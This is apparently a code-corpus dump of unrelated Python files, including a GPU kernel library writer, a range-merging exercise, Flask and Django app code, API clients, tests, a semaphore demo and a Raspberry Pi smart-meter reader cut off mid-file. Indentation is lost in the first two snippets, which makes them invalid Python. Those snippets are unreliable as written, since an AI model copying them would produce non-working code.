arguments["ShortNames"] = args.ShortNames
arguments["LibraryPrintDebug"] = args.LibraryPrintDebug
arguments["CodeFromFiles"] = False
arguments["EmbedLibrary"] = args.EmbedLibrary
assignGlobalParameters(arguments)
print1("# CodeObjectVersion from TensileCreateLibrary: %s" % arguments["CodeObjectVersion"])
print1("# CxxCompiler from TensileCreateLibrary: %s" % CxxCompiler)
if not os.path.exists(logicPath):
printExit("LogicPath %s doesn't exist" % logicPath)
logicFiles = [os.path.join(logicPath, f) for f in os.listdir(logicPath) \
if (os.path.isfile(os.path.join(logicPath, f)) \
and os.path.splitext(f)[1]==".yaml")]
print1("# LibraryLogicFiles:" % logicFiles)
for logicFile in logicFiles:
print1("# %s" % logicFile)
##############################################################################
# Parse config files
##############################################################################
solutions = []
logicData = {} # keys are problemTypes, values are schedules
newMasterLibrary = None
libraries = Common.ParallelMap(YAMLIO.readLibraryLogicForSchedule, logicFiles, "Reading logic files")
for logic in Utils.tqdm(libraries, "Processing logic data"):
(scheduleName, deviceNames, problemType, solutionsForSchedule, \
indexOrder, exactLogic, rangeLogic, newLibrary) = logic
if problemType not in logicData:
logicData[problemType] = []
logicData[problemType].append((scheduleName, deviceNames, \
solutionsForSchedule, indexOrder, exactLogic, rangeLogic ))
for solution in solutionsForSchedule:
if solution not in solutions:
solutions.append(solution)
if newMasterLibrary is None:
newMasterLibrary = newLibrary
else:
newMasterLibrary.merge(newLibrary)
# create solution writer and kernel writer
kernels = []
kernelsBetaOnly = []
for solution in solutions:
solutionKernels = solution.getKernels()
for kernel in solutionKernels:
if kernel not in kernels:
kernels.append(kernel)
solutionKernelsBetaOnly = solution.getKernelsBetaOnly()
for kernel in solutionKernelsBetaOnly:
if kernel not in kernelsBetaOnly:
kernelsBetaOnly.append(kernel)
# if any kernels are assembly, append every ISA supported
if globalParameters["ShortNames"] and not globalParameters["MergeFiles"]:
solutionSerialNaming = Solution.getSerialNaming(solutions)
kernelSerialNaming = Solution.getSerialNaming(kernels)
else:
solutionSerialNaming = None
kernelSerialNaming = None
solutionMinNaming = Solution.getMinNaming(solutions)
kernelMinNaming = Solution.getMinNaming(kernels)
solutionWriter = SolutionWriter( \
solutionMinNaming, solutionSerialNaming, \
kernelMinNaming, kernelSerialNaming)
kernelWriterSource = KernelWriterSource( \
kernelMinNaming, kernelSerialNaming)
kernelWriterAssembly = KernelWriterAssembly( \
kernelMinNaming, kernelSerialNaming)
libraryStaticFiles = [
"SolutionMapper.h",
"TensileTypes.h",
"tensile_bfloat16.h",
"KernelHeader.h",
"SolutionHelper.cpp",
"SolutionHelper.h",
"Tools.cpp",
"Tools.h" ]
# write cmake
clientName = "LibraryClient"
writeCMake(outputPath, solutions, kernels, libraryStaticFiles, clientName )
# write solutions and kernels
problemTypes = list(logicData.keys())
codeObjectFiles = writeSolutionsAndKernels(outputPath, CxxCompiler, problemTypes, solutions,
kernels, kernelsBetaOnly,
solutionWriter,
kernelWriterSource, kernelWriterAssembly)
# write logic
writeLogic(outputPath, logicData, solutionWriter)
newLibraryDir = ensurePath(os.path.join(outputPath, 'library'))
masterFile = os.path.join(newLibraryDir, "TensileLibrary.yaml")
newMasterLibrary.applyNaming(kernelMinNaming)
YAMLIO.write(masterFile, Utils.state(newMasterLibrary))
if args.EmbedLibrary is not None:
embedFileName = os.path.join(outputPath, "library/{}.cpp".format(args.EmbedLibrary))
with EmbeddedData.EmbeddedDataFile(embedFileName) as embedFile:
embedFile.embed_file(newMasterLibrary.cpp_base_class, masterFile, nullTerminated=True,
key=args.EmbedLibraryKey)
for co in Utils.tqdm(codeObjectFiles):
embedFile.embed_file("SolutionAdapter", co, nullTerminated=False,
key=args.EmbedLibraryKey)
print1("# Tensile Library Writer DONE")
print1(HR)
print1("")
| StarcoderdataPython |
4818722 | <reponame>hoaiphun96/Leet-Code-Problems
"""
Given a sorted list of integer ranges (see Range in Use Me) and a new range as inputs, insert the new range at the correct position and merge all overlapping ranges.
Note: Check out the Use Me section to get the structure of the Range class.
Example:
Input : [[1,10], [5,8], [8,15]]
New range : [9,20]
Output : [[1,20]]
"""
#Approach 1:
def insert_and_merge(input_range_list, new_range):
position = find_insert_position(input_range_list, new_range)
if position == len(input_range_list):
input_range_list.append(new_range)
else:
input_range_list = input_range_list[:position] + [new_range] + input_range_list[position:]
return merge_ranges(input_range_list)
def find_insert_position(input_range_list, new_range):
left, right = 0, len(input_range_list) - 1
while left <= right:
middle = (left + right) // 2
if input_range_list[middle].lower_bound > new_range.lower_bound:
right = middle - 1
elif input_range_list[middle].lower_bound < new_range.lower_bound:
left = middle + 1
else:
return middle + 1
return left
def merge_ranges(input_range_list):
ret = [input_range_list[0]]
for index in range(1, len(input_range_list)):
if input_range_list[index].lower_bound <= ret[-1].upper_bound:
ret[-1].upper_bound = max(ret[-1].upper_bound, input_range_list[index].upper_bound)
else:
ret.append(input_range_list[index])
return ret
#Approach 2
def insert_and_merge(input_range_list, new_range):
# Insert Range
insert_list = []
for range in input_range_list:
if range.upper_bound < new_range.lower_bound:
insert_list.append(range)
else:
if range.lower_bound > new_range.upper_bound:
insert_list.append(new_range)
new_range = range
else:
                if range.upper_bound >= new_range.lower_bound or range.lower_bound <= new_range.upper_bound:
new_range = Range(min(range.lower_bound, new_range.lower_bound),
max(new_range.upper_bound, range.upper_bound))
insert_list.append(new_range)
# Merge ranges
output_list = []
previous = insert_list[0]
i = 1
while i < len(insert_list):
current = insert_list[i]
if (previous.upper_bound >= current.lower_bound):
merged = Range(previous.lower_bound, max(previous.upper_bound, current.upper_bound));
previous = merged
else:
output_list.append(previous)
previous = current
i = i + 1
output_list.append(previous)
return output_list
| StarcoderdataPython |
172369 | <reponame>FelixWeichselgartner/PiHeld
# https://github.com/fidoriel/pyMCP23017
import pyMCP23017
from time import sleep
mcp = pyMCP23017.MCP23017(0x20)
pin=7
mcp.setup(pin, mcp.OUT)
pin2=8
mcp.setup(pin2, mcp.OUT)
while 1:
sleep(1)
mcp.output(pin, mcp.HIGH)
mcp.output(pin2, mcp.LOW)
sleep(1)
mcp.output(pin2, mcp.HIGH)
mcp.output(pin, mcp.LOW)
| StarcoderdataPython |
4812083 | <reponame>bobosoft/intrepyd
import unittest
from intrepyd.iec611312py.expression import ConstantOcc, VariableOcc
from intrepyd.iec611312py.variable import Variable
from intrepyd.iec611312py.datatype import Primitive
from intrepyd.iec611312py.expression import Expression
from intrepyd.iec611312py.inferdatatype import InferDatatypeBottomUp, InferDatatypeTopDown
from intrepyd.iec611312py.statement import Assignment
boolType = Primitive('BOOL')
intType = Primitive('INT')
class TestSTInferDatatype(unittest.TestCase):
def test_eq_1(self):
a = Variable('a', intType, Variable.LOCAL)
var = VariableOcc(a)
cst = ConstantOcc('0')
eq = Expression('=', [var, cst])
idbu = InferDatatypeBottomUp()
idbu.process_statements([eq])
self.assertEqual(eq.datatype, boolType)
idtd = InferDatatypeTopDown()
idtd.process_statements([eq])
self.assertEqual(cst.datatype, intType)
def test_eq_2(self):
a = Variable('a', intType, Variable.LOCAL)
var = VariableOcc(a)
cst = ConstantOcc('0')
plus = Expression('+', [var, cst])
idbu = InferDatatypeBottomUp()
idbu.process_statements([plus])
self.assertEqual(plus.datatype, intType)
idtd = InferDatatypeTopDown()
idtd.process_statements([plus])
self.assertEqual(cst.datatype, intType)
def test_eq_3(self):
a = Variable('a', intType, Variable.LOCAL)
var = VariableOcc(a)
cst = ConstantOcc('0')
assign = Assignment(var, cst)
idbu = InferDatatypeBottomUp()
idbu.process_statements([assign])
idtd = InferDatatypeTopDown()
idtd.process_statements([assign])
self.assertEqual(cst.datatype, intType)
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
3208313 | <filename>application.py
import sys
import click
import os
import glob
from flask import Flask, Markup, Response, render_template, render_template_string, send_from_directory, current_app, safe_join
from flask_flatpages import FlatPages, pygmented_markdown, pygments_style_defs
from flask_frozen import Freezer
app = Flask(__name__)
app.config.from_object('settings')
pages = FlatPages(app)
freezer = Freezer(app=app, log_url_for=True, with_static_files=True)
def get_pages(**kwargs):
"""
Convenience function to get one or more pages by one or more of its
metadata items.
"""
pass
def get_pages_by_slug(slug):
for p in pages:
if p.meta.get('slug', None) == slug:
return p
def get_pages_by_tags(*args):
tag_set = set(args)
pages_ = (p for p in pages if tag_set & set(p.meta.get('tags','')))
return sorted(pages_, reverse=True, key=lambda p: p.meta['date'])
def get_pages_by_missing_tags(*args):
tag_set = set(args)
pages_ = (p for p in pages if tag_set - set(p.meta.get('tags','')))
return sorted(pages_, reverse=True, key=lambda p: p.meta['date'])
def get_pages_sorted(sort_by='date', reverse=True, page_type='article'):
pages_ = (p for p in pages if p.meta.get('status','') == 'published' and p.meta.get('type','') == page_type)
return sorted(pages_, reverse=reverse, key=lambda p: p.meta[sort_by])
def get_related_pages(page):
"""
Get related pages by using overlapping tags.
"""
pass
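# The helpers above and the routes below assume each flatpage carries front-matter
# metadata along these lines (field names are taken from the meta.get() calls in this
# file; the values are illustrative only):
#
#   slug: some-article
#   date: 2019-01-01
#   tags: [geo]
#   status: published
#   type: article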
@app.route('/')
def index():
index = get_pages_by_slug('index')
articles = get_pages_by_tags('geo')
other_articles = get_pages_by_tags('other')
return render_template('index.html', **locals())
@app.route('/articles/<slug>/')
def article(slug):
article = get_pages_by_slug(slug)
article_html = article.html.replace("%%THANKS%%", '<p class="thanks">Thanks for reading! Get in touch via <a href="https://twitter.com/kokoalberti">@kokoalberti</a> for any questions or comments. I also post new articles there when they are first published.</p>')
return render_template('article.html', **locals())
@app.route('/articles/<slug>/<path:filename>')
def article_static(slug, filename):
article = get_pages_by_slug(slug)
directory = os.path.dirname(safe_join(current_app.root_path, current_app.config.get("FLATPAGES_ROOT"), article.path))
return send_from_directory(directory, filename)
@app.route('/pages/<slug>/')
def page(slug):
page = get_pages_by_slug(slug)
return render_template('page.html', **locals())
@app.route('/tag/<tag>/')
def tag(tag):
articles = get_pages_by_tags(tag)
article = ''
return render_template('tag.html', **locals())
@app.route('/sitemap.xml')
def sitemap():
server_name = current_app.config.get("SITEMAP_SERVER_NAME")
articles = get_pages_sorted()
pages = get_pages_sorted(page_type='page')
index = get_pages_by_slug('index')
tags = set()
for article in articles:
for tag in article.meta.get("tags",[]):
tags.add(tag)
return Response(render_template('sitemap.xml', **locals()), mimetype='application/xml')
@app.route('/robots.txt')
def robots():
server_name = current_app.config.get("SITEMAP_SERVER_NAME")
return Response(render_template('robots.txt', **locals()), mimetype='text/plain')
@app.route('/google0e9a29b6ad0a512a.html')
def google_verification():
return render_template('google0e9a29b6ad0a512a.html')
@freezer.register_generator
def other_static_files():
"""
Register the URLs for the robots and sitemap routes to frozen flask
"""
yield 'robots', {}
yield 'sitemap', {}
yield 'google_verification', {}
@freezer.register_generator
def article_static_files():
"""
Register the URLS for article's static files (PNG images only for now) to
frozen flask.
"""
static_patterns = ("*.png", "*.jpg", "*.zip")
for p in pages:
directory = os.path.dirname(safe_join(current_app.root_path, current_app.config.get("FLATPAGES_ROOT"), p.path))
files = []
for pattern in static_patterns:
files.extend(glob.glob(os.path.join(directory, "**", pattern), recursive=True))
for static_file in files:
filename = static_file.replace(directory+'/', "")
yield 'article_static', {'slug':p.meta.get('slug'), 'filename':filename}
@app.cli.command()
def freeze():
print("Freezing...")
freezer.freeze()
| StarcoderdataPython |
138828 | <reponame>Next-Gen-UI/Code-Dynamics
class MyHashSet:
def __init__(self):
self.set = [False] * 1000001
def add(self, key: int) -> None:
self.set[key] = True
def remove(self, key: int) -> None:
self.set[key] = False
def contains(self, key: int) -> bool:
return self.set[key]
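# Example usage (a LeetCode-style driver, not part of the original snippet):
#   obj = MyHashSet()
#   obj.add(5)
#   obj.contains(5)   # True
#   obj.remove(5)
#   obj.contains(5)   # False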
| StarcoderdataPython |
90079 | from handler.base_plugin import BasePlugin
class AutoSender(BasePlugin):
__slots__ = ("text", )
def __init__(self, text):
"""Answers with text `text` to user without any conditions."""
super().__init__()
self.text = text
async def check_message(self, msg):
return True
async def process_message(self, msg):
await msg.answer(self.text)
| StarcoderdataPython |
1785250 | """Wrapper class for WPWithin Service."""
import os
import time
import sys
import threading
from pkg_resources import resource_filename
import thriftpy
from thriftpy.rpc import make_client
from thriftpy.protocol.binary import TBinaryProtocolFactory
from thriftpy.transport.buffered import TBufferedTransportFactory
from .wpwithin_types import Error
from .converters import ConvertToThrift, ConvertFromThrift
from .launcher import run_rpc_agent, start_server
from .make_simple_server import make_simple_server
THRIFT_WPW_PATH = resource_filename(__name__, 'wpwithin.thrift')
wpw_thrift = thriftpy.load(THRIFT_WPW_PATH,
module_name="wpw_thrift",
include_dirs=[os.path.dirname(THRIFT_WPW_PATH)])
THRIFT_TYPES_PATH = resource_filename(__name__, 'wptypes.thrift')
wptypes_thrift = thriftpy.load(THRIFT_TYPES_PATH,
module_name="wptypes_thrift",
include_dirs=[os.path.dirname(THRIFT_TYPES_PATH)])
class WPWithin(object):
"""Wrapper class for thrift generated struct WPWithin."""
def __init__(self,
host,
port,
start_rpc=True,
rpc_dir=None,
start_callback_server=False,
callback_port=None,
event_listener=None):
"""Initialise WPWithin object.
host (integer): Client host
port (integer): Client port
(optional) start_rpc (boolean): Whether to start an rpc agent. Defaults to True.
(optional) rpc_dir: path to directory with rpc agent launchers. If not specified,
will search for the files in ./wpw-bin/ and $WPW_HOME/bin, in that order.
(optional) start_callback_server (boolean): Whether to start a callback server.
Defaults to False. If True, callback_port and event_listener must be specified.
(optional) callback_port (integer): port to listen for callback events
(optional) event_listener: instance of a class which implements AbstractEventListener.
"""
if start_callback_server and (callback_port is None or event_listener is None):
raise ValueError('No callback port or listener provided')
if start_rpc:
self._rpc = run_rpc_agent(port,
rpc_dir,
start_callback_server,
callback_port)
time.sleep(1)
self._thrift_client = make_client(wpw_thrift.WPWithin,
host=host,
port=port,
proto_factory=TBinaryProtocolFactory(),
trans_factory=TBufferedTransportFactory())
if start_callback_server:
self._server = make_simple_server(wpw_thrift.WPWithinCallback,
event_listener,
host=host,
port=callback_port)
self._server_thread = threading.Thread(target=start_server,
args=([self._server]))
self._server_thread.daemon = True
self._server_thread.start()
def shutdown(self):
"""Close all processes started."""
self._thrift_client.close()
if hasattr(self, '_server'):
self._server.close()
if hasattr(self, '_rpc'):
self._rpc.kill()
sys.exit(0)
def setup(self, name, description):
"""Setup the thrift client."""
try:
self._thrift_client.setup(name, description)
except wptypes_thrift.Error as err:
raise Error(err.message)
def add_service(self, svc):
"""Add service svc to the client.
svc: instance of Service.
"""
service = ConvertToThrift.service(svc)
try:
self._thrift_client.addService(service)
except wptypes_thrift.Error as err:
raise Error(err.message)
def remove_service(self, svc):
"""Remove service svc to the client.
svc: instance of Service.
"""
service = ConvertToThrift.service(svc)
try:
self._thrift_client.removeService(service)
except wptypes_thrift.Error as err:
raise Error(err.message)
def init_consumer(self,
scheme,
hostname,
port,
url_prefix,
client_id,
hce_card,
psp_config):
"""Initialise a consumer on the client.
hce_card: instance of HCECard
psp_config: Payment Service Provider details.
Must include psp_name and api_endpoint. Example:
{
"psp_name": "worldpayonlinepayments",
"api_endpoint": "https://api.worldpay.com/v1",
}
For more details see:
https://github.com/WPTechInnovation/worldpay-within-sdk/wiki/Worldpay-Total-US-(SecureNet)-Integration#usage
"""
card = ConvertToThrift.hce_card(hce_card)
try:
self._thrift_client.initConsumer(scheme,
hostname,
port,
url_prefix,
client_id,
card,
psp_config)
except wptypes_thrift.Error as err:
raise Error(err.message)
def init_producer(self, psp_config):
"""Initialise a producer on the client.
psp_config: Payment Service Provider details. For details see:
https://github.com/WPTechInnovation/worldpay-within-sdk/wiki/Worldpay-Total-US-(SecureNet)-Integration#usage
"""
try:
self._thrift_client.initProducer(psp_config)
except wptypes_thrift.Error as err:
raise Error(err.message)
def get_device(self):
return ConvertFromThrift.device(self._thrift_client.getDevice())
def start_service_broadcast(self, timeout_ms):
"""Start broadcasting services added to client.
        If timeout_ms=0, broadcasts indefinitely.
"""
try:
self._thrift_client.startServiceBroadcast(timeout_ms)
except wptypes_thrift.Error as err:
raise Error(err.message)
def stop_service_broadcast(self):
try:
self._thrift_client.stopServiceBroadcast()
except wptypes_thrift.Error as err:
raise Error(err.message)
def device_discovery(self, timeout_ms):
"""Return list of ServiceMessage found on the network."""
try:
service_messages = self._thrift_client.deviceDiscovery(timeout_ms)
except wptypes_thrift.Error as err:
raise Error(err.message)
else:
svc_messages = []
for val in service_messages:
svc_messages.append(ConvertFromThrift.service_message(val))
return svc_messages
def request_services(self):
"""Return list of ServiceDetails found on the network."""
try:
service_details = self._thrift_client.requestServices()
except wptypes_thrift.Error as err:
raise Error(err.message)
else:
svc_details = []
for val in service_details:
svc_details.append(ConvertFromThrift.service_details(val))
return svc_details
def get_service_prices(self, service_id):
"""Return list of Price for specified service."""
try:
prices = self._thrift_client.getServicePrices(service_id)
except wptypes_thrift.Error as err:
raise Error(err.message)
else:
wprices = []
for val in prices:
wprices.append(ConvertFromThrift.price(val))
return wprices
def select_service(self, service_id, number_of_units, price_id):
"""Send request to buy number_of_units of service_id at price_id.
Return TotalPriceResponse, to be used as argument for WPWithin.make_payment.
"""
try:
service = self._thrift_client.selectService(service_id, number_of_units, price_id)
except wptypes_thrift.Error as err:
raise Error(err.message)
else:
return ConvertFromThrift.total_price_response(service)
def make_payment(self, request):
"""Pay for service.
request: TotalPriceResponse returned from WPWithin.select_service.
"""
trequest = ConvertToThrift.total_price_response(request)
try:
response = self._thrift_client.makePayment(trequest)
except wptypes_thrift.Error as err:
raise Error(err.message)
else:
return ConvertFromThrift.payment_response(response)
def begin_service_delivery(self, service_id, service_delivery_token, units_to_supply):
token = ConvertToThrift.service_delivery_token(service_delivery_token)
try:
token_received = self._thrift_client.beginServiceDelivery(
service_id,
token,
units_to_supply)
except wptypes_thrift.Error as err:
raise Error(err.message)
else:
return ConvertFromThrift.service_delivery_token(token_received)
def end_service_delivery(self, service_id, service_delivery_token, units_received):
token = ConvertToThrift.service_delivery_token(service_delivery_token)
try:
token_received = self._thrift_client.endServiceDelivery(service_id,
token,
units_received)
except wptypes_thrift.Error as err:
raise Error(err.message)
else:
return ConvertFromThrift.service_delivery_token(token_received)
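# A minimal consumer-side flow, sketched from the methods above. The host, port,
# client id, hce_card and psp_config values are placeholders (assumptions), to be
# built as described in the init_consumer() docstring:
#
#   client = WPWithin("127.0.0.1", 9091, start_rpc=True)
#   client.setup("py-consumer", "Example consumer device")
#   client.init_consumer("http://", "192.168.0.10", 8080, "/", "client-id",
#                        hce_card, psp_config)
#   services = client.request_services()      # discover services on the network
#   ...                                        # select_service() / make_payment()
#   client.shutdown()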
| StarcoderdataPython |
3227209 | <filename>projecteuler/fastdoublingfib.py
import time
def _fib(n):
    """Fast doubling: return the pair (F(n), F(n+1))."""
    if n == 0:
        return (0, 1)
    else:
        a, b = _fib(n // 2)
        # F(2k)   = F(k) * (2*F(k+1) - F(k))
        # F(2k+1) = F(k)**2 + F(k+1)**2
        c = a * (b * 2 - a)
        d = a * a + b * b
        if n % 2 == 0:
            return (c, d)
        else:
            return (d, c + d)
# Time the fast-doubling computation of F(200).
start = time.time()
print(_fib(200)[0])
end = time.time()
print(end - start)
 | StarcoderdataPython |
30158 | <reponame>capellaspace/console-client<filename>tests/test_search.py<gh_stars>10-100
#!/usr/bin/env python
import pytest
from .test_data import get_search_test_cases, search_catalog_get_stac_ids
from capella_console_client import client
from capella_console_client.validate import _validate_uuid
from capella_console_client.search import _paginated_search
@pytest.mark.parametrize("search_args,expected", get_search_test_cases())
def test_search(search_args, expected, search_client):
search_client.search(**search_args)
assert client._paginated_search.call_args[0][1] == expected
def test_validate_uuid_raises():
with pytest.raises(ValueError):
_validate_uuid("123")
def test_paginated_search_single_page(single_page_search_client):
results = _paginated_search(single_page_search_client._sesh, payload={"limit": 1})
assert len(results) == 1
assert results[0] == search_catalog_get_stac_ids()["features"][0]
def test_paginated_search_multi_page(multi_page_search_client):
results = _paginated_search(multi_page_search_client._sesh, payload={"limit": 10})
assert len(results) == 10
| StarcoderdataPython |
1629385 | <gh_stars>0
#!/usr/bin/python
# -*- coding: utf-8 -*-
import openpyxl
import os, sys, shutil
import json
from datetime import datetime
from optparse import OptionParser
config = {}
def row_to_data(row):
data = {
'label': row[config['label']].value,
'file': row[config['file']].value,
'translations': {}
}
for key in config['translations'].keys():
data['translations'][key] = row[config['translations'][key]].value
return data
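# row_to_data() and main() imply a config.json of roughly this shape (the column
# indexes and language codes here are illustrative assumptions, not taken from the
# project):
#
# {
#     "label": 0,
#     "file": 1,
#     "default": "en",
#     "translations": {"en": 2, "it": 3}
# }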
class File:
def __init__(self, id):
self.idd = id
self.labels = []
def add_label(self, label):
self.labels.append(label)
def format(self, language):
file_format = '<?xml version="1.0" encoding="utf-8"?>\n<resources>\n\n'
for label in self.labels:
label_format = label.format(language)
if label_format:
file_format += "%s\n" % label.format(language)
file_format += "\n\n</resources>"
return file_format
class Label:
def __init__(self, id):
self.idd = id
self.translations = {}
def add_translation(self, language, translation):
self.translations[language] = translation
def format(self, language):
if not self.translations[language]:
return None
if not self.translations[language].startswith('['):
return '<string name="%s">%s</string>' % (self.idd, self.__ap(self.translations[language]))
else:
items_string = ""
for item in self.translations[language].replace("[", "").replace("]", "").split(","):
items_string += "\t<item>%s</item>\n" % self.__ap(item)
array_string = '<string-array name="%s">\n%s</string-array>' % (self.idd, items_string)
return array_string
def __ap(self, item):
return item.replace("\'", "\\\'").replace("\"", "\\\"")
def validate_data(data):
if data['file'] and data['file'].endswith(".xml") and data['label']:
return True
return False
def create_label_from_data(data):
label = Label(data['label'])
for k in data['translations'].keys():
label.add_translation(k, data['translations'][k])
return label
def main():
usage = "Usage: %prog [options] path_file.xlsx"
parser = OptionParser(usage=usage)
parser.add_option( "-c", "--config-file", dest="config_file",
default="config.json", help="Configuration file" )
(options, args) = parser.parse_args()
if len(args) == 0:
parser.print_usage()
exit(0)
if len(args) == 1:
filename = args[0]
if not os.path.exists(filename):
print "Error! %s xlsx file doesn't exist" % config_file
exit(0)
config_file = options.config_file
if not os.path.exists(config_file):
print "Error! %s configuration file doesn't exist" % config_file
exit(0)
f = open(config_file, "r")
json_file_content = f.read()
print json_file_content
global config
config = json.loads(json_file_content)
default = config['default']
files = {}
print ""
print "+++++++++++++++++++++++++++"
print "+ XLSXI18N +"
print "+++++++++++++++++++++++++++"
print ""
print "Reading %s..." % filename
workbook = openpyxl.load_workbook(filename)
worksheet = workbook.get_sheet_by_name('Languages')
for row in worksheet.rows:
data = row_to_data(row)
if validate_data(data):
file_name = data['file']
if not file_name in files:
files[file_name] = File(file_name)
label = create_label_from_data(data)
files[file_name].add_label(label)
try:
if os.path.exists("res"):
dest_folder = "backup_res_%s" % datetime.now().strftime('%Y%m%d_%H%M%S')
print "Backing up 'res' folder into '%s'" % dest_folder
shutil.copytree("res", dest_folder)
except OSError:
pass
print "Writing files..."
for k in data['translations'].keys():
if default == k:
folder = os.path.join("res", "values")
else:
folder = os.path.join("res", "values-%s" % k)
if not os.path.exists(folder):
os.makedirs(folder)
for file_k in files.keys():
f = open(os.path.join(folder, file_k), "w")
f.write(files[file_k].format(k).encode('utf8'))
print "End"
if __name__ == "__main__":
    main()
 | StarcoderdataPython |
3262000 | import requests
from requests.auth import HTTPBasicAuth
from .errors import *
from .config import config as target_config
class TargetApiClient(object):
def __init__(self, account_sid, access_token):
self.config = target_config
self.set_config({
'account_sid': account_sid,
'access_token': access_token
})
def set_config(self, config):
self.config.update(config)
def call(self, resource, params):
if 'account_sid' not in self.config:
raise TargetApiParameterNotImplementedError(parameter='account_sid')
if 'access_token' not in self.config:
raise TargetApiParameterNotImplementedError(parameter='access_token')
if not self._validate_parameters(params):
raise TargetApiParamsError()
response = self._make_call(resource, params)
if response.status_code != 200:
# Process errors
if response.status_code == 400:
raise TargetApiBadRequestError()
elif response.status_code == 401:
raise TargetApiUnauthorizedError()
elif response.status_code == 404:
raise TargetApiNotFoundError()
elif response.status_code == 405:
raise TargetApiMethodNotAllowedError()
elif response.status_code == 500:
raise TargetApiServerError()
elif response.status_code == 503:
raise TargetApiServiceUnavailableError()
else:
raise TargetApiUnknownError()
if response.headers['content-type'].find('application/json') != -1:
return response.json()
return response.content
def _make_call(self, resource, params):
return requests.get(
self._generate_url(resource),
params=params,
auth=HTTPBasicAuth(self.config['account_sid'], self.config['access_token'])
)
@classmethod
def _validate_parameters(cls, params):
if 'Query' not in params:
return False
return True
def _generate_url(self, resource_name):
if 'base_url' not in self.config:
raise TargetApiParameterNotImplementedError(parameter='base_url')
if 'account_sid' not in self.config:
raise TargetApiParameterNotImplementedError(parameter='account_sid')
return self.config['base_url']\
.replace('{AccountSID}', self.config['account_sid'])\
.replace('{ResourceName}', resource_name)
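# Example usage (hypothetical credentials and resource name; the account SID, access
# token and base_url template come from the Target API configuration):
#   client = TargetApiClient("account_sid", "access_token")
#   data = client.call("products", {"Query": "lego"})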
| StarcoderdataPython |
1678355 | <reponame>luminousmen/grokking_concurrency
#!/usr/bin/env python3
"""Implementing parking garage using semaphore for control critical section"""
import time
from threading import Thread, Semaphore
CAPACITY = 5
# shared memory
BUFFER = ["" for i in range(CAPACITY)]
mutex = Semaphore()
empty = Semaphore(CAPACITY)
full = Semaphore(0)
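# Bookkeeping for the bounded buffer: `empty` counts free slots (starts at CAPACITY),
# `full` counts filled slots (starts at 0), and `mutex` guards BUFFER and the shared
# producer index, so producers block when the buffer is full and consumers block when
# it is empty.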
producer_idx = 0
class Producer(Thread):
def __init__(self, name: str, items_amount: int = 5):
super().__init__()
self.counter = 0
self.name = name
self.items_amount = items_amount
def next_index(self, producer_idx) -> int:
return (producer_idx + 1) % CAPACITY
def run(self):
global producer_idx
while self.counter < self.items_amount:
empty.acquire()
mutex.acquire()
self.counter += 1
BUFFER[producer_idx] = f"{self.name}-{self.counter}"
print(f"{self.name} produced: `{BUFFER[producer_idx]}`")
producer_idx = self.next_index(producer_idx)
mutex.release()
full.release()
# simulating some real action here
time.sleep(1)
class Consumer(Thread):
def __init__(self, name: str, items_amount: int = 10):
super().__init__()
self.name = name
self.idx = 0
self.counter = 0
self.items_amount = items_amount
def next_index(self):
return (self.idx + 1) % CAPACITY
def run(self):
while self.counter < self.items_amount:
full.acquire()
mutex.acquire()
item = BUFFER[self.idx]
print(f"{self.name} consumed item: `{item}`")
self.idx = self.next_index()
self.counter += 1
mutex.release()
empty.release()
# simulating some real action here
time.sleep(2)
if __name__ == "__main__":
threads = [
Producer("John"),
Producer("Sara"),
Consumer("Bob")
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
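    # The two producers create 5 items each (10 in total) and the consumer takes 10,
    # so every thread eventually finishes and the join() calls above return.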
| StarcoderdataPython |
173914 | <filename>storemanager/users/admin.py
from django.contrib import admin
from .models import User,UserProfile
admin.site.register(User)
admin.site.register(UserProfile)
| StarcoderdataPython |
1655519 | <reponame>yawatajunk/Wi-Sun_EnergyMeter<filename>sem_com.py
#!/usr/bin/python3
# coding: UTF-8
import argparse
import binascii
import datetime
import glob
import json
import threading
import time
import os
import pickle
import socket
import sys
import RPi.GPIO as gpio
from y3module import Y3Module
from echonet_lite import *
import user_conf
# Constant definitions
Y3RESET_GPIO = 18 # GPIO used to reset the Wi-SUN module
LED_GPIO = 4 # GPIO for the LED
# Log file settings
TMP_LOG_DIR = '/tmp/' # temporary log directory
LOG_DIR = 'sem_app/public/logs/' # log directory, relative to this script
SOCK_FILE = TMP_LOG_DIR + 'sem.sock' # UNIX socket
TMP_LOG_FILE = TMP_LOG_DIR + 'sem.csv' # temporary log file
POW_DAYS_JSON_FILE = LOG_DIR + 'pow_days.json' # power log file in JSON format
POW_DAY_LOG_HEAD = 'pow_day_' # prefix of the daily log file names
POW_DAY_LOG_FMT = '%Y%m%d' # date format
CURR_POW_FILE = TMP_LOG_DIR + 'curr_pow.txt'
# Storage for low-voltage smart energy meter information
sem_info = {}
def gpio_init():
"""GPIO初期化"""
gpio.setwarnings(False)
gpio.setmode(gpio.BCM)
gpio.setup(Y3RESET_GPIO, gpio.OUT)
gpio.setup(LED_GPIO, gpio.OUT)
gpio.output(Y3RESET_GPIO, gpio.HIGH)
time.sleep(0.1)
gpio.output(LED_GPIO, gpio.LOW)
class LedThread(threading.Thread):
"""LEDを点滅させるスレッド"""
def __init__(self):
super().__init__()
self._trigger = False
self._termFlag = False
def run(self):
while not self._termFlag:
if self._trigger:
self.ledon(True)
time.sleep(0.3)
self.ledon(False)
self._trigger = False
else:
time.sleep(0.1)
@staticmethod
def ledon(ctl):
if ctl:
gpio.output(LED_GPIO, gpio.HIGH)
else:
gpio.output(LED_GPIO, gpio.LOW)
def oneshot(self):
self._trigger = True
def terminate(self):
self._termFlag = True
self.join()
def y3reset():
"""Wi-Sunモジュールのリセット"""
gpio.output(Y3RESET_GPIO, gpio.LOW) # high -> low -> high
time.sleep(0.5)
gpio.output(Y3RESET_GPIO, gpio.HIGH)
time.sleep(2.0)
class Y3ModuleSub(Y3Module):
"""Y3Module()のサブクラス"""
global sem_inf_list
def __init__(self):
super().__init__()
self.EHD = '1081'
        self.ECV_INF = '73' # ECHONET ECV code (INF)
    # run() of the UART receive thread, extended to handle ECHONET Lite frames
    # UART receive thread
def run(self):
while not self.term_flag:
msg = self.read()
if msg:
msg_list = self.parse_message(msg)
                # debug: reception of UDP (PANA) data
if msg_list['COMMAND'] == 'ERXUDP' and msg_list['LPORT'] == self.Y3_UDP_PANA_PORT:
sys.stdout.write('[PANA]: {}\n'.format(msg_list['DATA']))
                # Property notifications sent spontaneously by the smart meter
if msg_list['COMMAND'] == 'ERXUDP' and msg_list['DATA'][0:4] == self.EHD \
and msg_list['DATA'][20:22] == self.ECV_INF:
sem_inf_list.append(msg_list)
